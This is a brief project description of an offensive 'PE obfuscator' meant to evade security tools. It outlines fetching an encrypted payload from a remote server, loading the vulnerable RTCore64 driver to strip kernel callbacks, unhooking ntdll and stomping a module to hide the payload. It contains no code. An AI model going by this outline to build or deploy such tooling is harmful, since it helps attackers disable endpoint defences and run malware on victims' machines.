PE-Obfuscator: PE obfuscator with Evasion in mind
PE-Obfuscator
PE obfuscator with Evasion in mind needs Admin Privilege in order to load the RTCore64 driver.
The Obfuscator:
– Gets xored Fileless PE from a remote server
– Drop the Loader in the disk
– Add a random section to that Loader
– Add the xored Fileless PE to the newly created Loader section
The Loader:
– Unhook ntdll from knowndlls
– Drop RTCore64 to the disk
– Load/Install RTCore64
– Exploit RTCore64 to Remove Kernel Callbacks
– xor PE
– Map/Load PE from the added Section
– Stomped a big module that fit the PE.
